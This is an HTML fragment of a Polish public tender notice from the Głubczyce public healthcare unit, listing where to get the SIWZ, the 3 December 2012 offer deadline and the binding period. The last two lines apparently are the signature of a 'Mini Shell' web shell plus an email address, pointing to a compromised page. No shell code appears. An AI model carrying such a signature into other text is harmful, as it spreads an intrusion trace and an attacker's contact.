<p>Zgodnie z treścią art.144 Ustawy PZP Zamawiający przewidział w SIWZ możliwość zmiany postanowień zawartej umowy, na podstawie której dokonano wyboru Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozglubczyce.biulety.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Głubczycach, ul. Marii Skłodowskiej Curie 26, 48-100 Głubczyce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2012 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Opieki Zdrowotnej w Głubczycach, ul. Marii Skłodowskiej
Curie 26, 48-100 Głubczyce, sekretariat III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com